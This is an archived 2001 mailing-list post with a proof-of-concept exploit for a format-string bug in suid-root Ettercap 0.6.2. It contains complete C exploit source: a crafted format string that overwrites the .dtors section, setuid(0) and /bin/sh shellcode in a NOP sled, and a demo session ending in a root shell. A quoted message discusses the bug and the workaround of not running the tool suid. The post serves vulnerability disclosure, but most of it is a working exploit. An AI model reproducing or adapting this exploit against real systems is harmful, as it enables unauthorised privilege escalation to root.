Proof of concept for the format bug in Ettercap 0.6.2

From: BAILLEUX Christophe (cb@t-online.fr)
Date: Wed Dec 05 2001 - 03:25:00 PST


     Firstly, let's retrieve the address of the section .dtors:
    
     cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap
    
     /usr/local/sbin/ettercap:     file format elf32-i386
    
     Contents of section .dtors:
     8119a70 ffffffff 00000000                    ........
     cb@tshaw$
    
     So the fmt string is composed of:
    
     - "000" for alignment.
    
     - "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
        expect to write (here  .dtors + 4 -- 0x8119a74.)
    
     - "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.
    
     This format string was built using fmtbuilder:
     http://minimum.inria.fr/~raynal/index.php3?page=501
    
    
     ---- ettercap-exp.c ----
    
     #include <stdio.h>
     #include <stdlib.h>
     #include <string.h>   /* memset, memcpy, strlen */
     #include <unistd.h>   /* execl */

     int main(void)
     {

             char buf[1024];

             char shellcode[] =
               /* setuid(0) */
               "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
               /* Aleph 1 shellcode */
               "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
               "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
               "\x80\xe8\xdc\xff\xff\xff/bin/sh";

             /* "000" pads for alignment, the next 8 bytes are the two halves of
                .dtors + 4 (0x8119a74), then the two %hn directives do the write. */
             char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";

             /* NOP sled with the shellcode at the end; copy the terminating NUL
                as well so setenv() sees a proper C string. */
             memset(buf, 0x90, sizeof(buf));
             memcpy(buf + sizeof(buf) - strlen(shellcode) - 1, shellcode, strlen(shellcode) + 1);

             setenv("SHELLCODE", buf, 1);

             /* execl()'s argument list must be terminated by a null pointer */
             execl("/usr/local/sbin/ettercap", "ettercap", fmt, (char *)NULL);
             return 1;
     }
    
     ---- ettercap-exp.c  ----
    
    
     Demo:
    
     This demo is made with a suid root version.
    
     cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
     cb@tshaw$ ./ettercap-exp
    
     ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
    
     may the packets be with you...
    
    
     Invalid host address
     000tv00000000000000000000000000000000000000000000000000000000000000000000
     0000000000000000000000000000000000000000000000000000000000000000000000000
     0000000000000000000000000000000000000000000000000000000000000000000000000
     ....snip....
     0000000000000000000000000000000000000000000000081020c0 !!
    
     sh-2.04# id
     uid=0(root) groups=100(users)
    
    
    Best regards,
    
    
    --   
    Christophe Bailleux - Network & System Security Engineer
    Club-Internet / T-Online France 
    Voice:+33-(0)1-5545-4789 - mailto:cb@t-online.fr
    
    
    On Tue, 4 Dec 2001, Blue Boar wrote:
    
    > Gobbles sent another post to vuln-dev today, which was rejected due
    > to personal attacks in their note.  I want to check out their claim, 
    > however.  If you want to see their original posting, it's on their
    > web site like the others, I'm sure.  It includes a claimed exploit,
    > which cannot be posted due to their wishes that it not be separated
    > from the advisory.  If someone wants to write an independent exploit,
    > I'd be happy to post that, provided it follows the list rules,
    > of course.
    > 
    > Here's the basic problem:
    > 
    > ettercap %x%x%x%x%x%x%x
    > ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
    > 
    > may the packets be with you...
    > 
    > 
    > Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
    > 
    > Gobbles' point is that there is an option to configure it suid,
    > so this could be exploitable when that is used.  Why someone
    > would want a packet capture program to be used by non-priv users..
    > Well, I'm sure there's a good reason somewhere in the world.
    > 
    > Is anyone using it that way?  Are there OS distributions that come
    > with Ettercap installed by default?  And, of course, is it suid?
    > (I can't imagine it would be.)  The workaround is obvious, don't
    > run it suid or allow remote users who do not already have a shell
    > to execute it with a command-line parameter (such as via a web 
    > interface.)  
    > 
    > 					BB
    > 
    



    This archive was generated by hypermail 2b30 : Wed Dec 05 2001 - 10:09:19 PST